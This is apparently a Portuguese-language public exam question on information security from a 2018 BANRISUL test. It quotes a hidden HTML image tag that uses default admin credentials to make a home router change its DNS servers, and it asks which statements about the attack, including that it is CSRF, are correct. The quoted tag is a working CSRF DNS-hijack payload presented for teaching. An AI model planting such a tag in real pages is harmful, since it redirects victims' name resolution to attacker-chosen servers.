- ID
- 2756644
- Banca
- FAURGS
- Órgão
- BANRISUL
- Ano
- 2018
- Provas
- Disciplina
- Segurança da Informação
- Assuntos
Durante uma investigação de um incidente de segurança, constatou-se que o seguinte código estava embutido em
um determinado website:
<img src="http://admin:admin@10.1.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual =2&dnsserver=198.51.100.1&dnsserver2=203.0.113.7&hostName=TLINK&Save=Save" style="display:none" title="Carregando" alt="Carregando" width="100" heigth="40" />
Considere as afirmações abaixo sobre esse código.
I - Trata-se de ataque no qual se pretende modificar a configuração dos servidores de nomes de um dispositivo.
II - É um ataque que disponibiliza a configuração dos servidores de nomes utilizados pelo website.
III - Trata-se de um ataque do tipo Cross-Site Request Forgery (CSRF).
IV - É um ataque que pretende sobrecarregar o sistema com dados aleatórios para ter acesso a dados da memória de
um servidor web.
V - Trata-se de uma requisição que informa ao website qual a configuração de resolução de nomes utilizada pelo
usuário.
Quais estão corretas?